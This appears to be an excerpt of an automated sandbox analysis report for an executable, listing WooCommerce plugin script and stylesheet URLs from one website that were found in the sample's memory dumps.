                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/front.js?ver=1.3.7
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/price-slider_33.js?ver=1.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/css/style.css?ver=3.1.7
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/css/toggle-switch.css?ver=3.1.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/js/add-to-cart.js?ver=3.1.7
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-pdf-catalog/public/css/woocommerce-pdf-catalog
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=5.5.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=5
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=5.5.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/jquery-ui-touch-punch/jquery-ui-touc
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4
